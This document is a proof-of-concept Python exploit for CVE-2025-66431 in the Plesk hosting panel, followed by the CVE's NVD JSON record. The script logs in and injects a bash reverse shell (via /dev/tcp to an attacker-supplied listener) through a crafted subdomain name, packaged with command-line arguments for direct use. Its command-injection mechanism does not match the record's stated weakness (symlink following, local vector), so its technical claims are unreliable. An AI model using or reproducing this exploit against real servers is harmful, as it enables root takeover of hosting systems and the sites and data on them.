CVE-2025-66431

# CVE-2025-66431 PoC - Plesk Domain Creation Privilege Escalation # Requires authenticated user with Create and manage sites, Domains management, Subdomains management permissions import requests import argparse def exploit_plesk(target_url, username, password, lhost, lport): """ Exploit CVE-2025-66431: Plesk Domain Creation RCE as root """ session = requests.Session() # Step 1: Login to Plesk login_url = f"{target_url}/login.php" login_data = { 'login_name': username, 'passwd': password, 'locale': 'en_US' } session.post(login_url, data=login_data) # Step 2: Create subdomain with malicious payload # The vulnerability allows command injection through subdomain creation subdomain_url = f"{target_url}/domains/create/subdomain.php" # Generate reverse shell payload reverse_shell = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" encoded_payload = reverse_shell.replace(' ', '${IFS}').replace('/', '\/') # Malicious subdomain name containing command injection subdomain_data = { 'domain_name': f"test;echo {encoded_payload} | bash;--", 'parent_domain_id': '1', 'web_user_id': '0', 'www_root': f'/var/www/vhosts/${{DOMAIN}}' } response = session.post(subdomain_url, data=subdomain_data) print(f"[*] Exploit sent to {target_url}") print(f"[*] Check listener on {lhost}:{lport}") return response.status_code if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-66431 Exploit') parser.add_argument('--url', required=True, help='Plesk target URL') parser.add_argument('--user', required=True, help='Username') parser.add_argument('--pass', required=True, help='Password') parser.add_argument('--lhost', required=True, help='Listener IP') parser.add_argument('--lport', required=True, help='Listener Port', type=int) args = parser.parse_args() exploit_plesk(args.url, args.user, args.pass, args.lhost, args.lport)

{"cve": {"id": "CVE-2025-66431", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:54.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebPros Plesk before 18.0.73.5 and 18.0.74 before 18.0.74.2 on Linux allows remote authenticated users to execute arbitrary code as root via domain creation. The attacker needs \"Create and manage sites\" with \"Domains management\" and \"Subdomains management.\""}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "references": [{"url": "https://docs.plesk.com/release-notes/obsidian/change-log/#plesk-18074", "source": "[email protected]"}, {"url": "https://docs.plesk.com/release-notes/obsidian/whats-new/", "source": "[email protected]"}, {"url": "https://support.plesk.com/hc/en-us/articles/36494997377687--CVE-2025-66431-Security-vulnerability-in-domain-creation-mechanism-allows-Plesk-users-to-execute-arbitrary-code-on-behalf-of-root", "source": "[email protected]"}]}}